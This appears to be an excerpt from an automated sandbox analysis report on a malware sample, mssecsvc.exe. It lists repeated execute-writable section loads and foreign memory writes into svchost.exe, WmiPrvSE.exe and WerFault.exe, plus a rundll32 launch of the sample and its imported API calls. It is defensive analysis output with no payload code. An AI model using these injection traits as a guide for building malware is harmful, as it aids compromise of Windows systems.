Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\mssecsvc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\mssecsvc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\dllhost.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462FE0	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462DC0	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463620	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462F60	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463710	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462C00	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F30000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320F50000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E320FB0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 5960000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4AF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD555A0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0BC0000	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462FE0	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462DC0	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463620	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462F60	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463710	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462C00	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1

Jump to behavior

Source: dwm.exe, 00000012.00000002.2784770464.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000012.00000000.1513674447.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000007.00000000.1470052390.000002E991B71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2752534825.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000002.2790009501.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000007.00000000.1470052390.000002E991B71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2752534825.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000002.2790009501.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000007.00000000.1470052390.000002E991B71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2752534825.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000002.2790009501.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: winlogon.exe, 00000007.00000000.1470052390.000002E991B71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2752534825.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000002.2790009501.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD116F LoadLibraryA,GetModuleHandleA,lstrcat,lstrcatW,CreateEventA,CreateFileMappingA,GetDriveTypeA,GetFileAttributesA,GetFileTime,GetModuleFileNameA,GetSystemTime,GetTempPathA,GetVersion,GetVersionExA,MapViewOfFile,SetEndOfFile,SetFileAttributesA,UnmapViewOfFile,WriteFile,LookupPrivilegeValueA,NtAdjustPrivilegesToken,

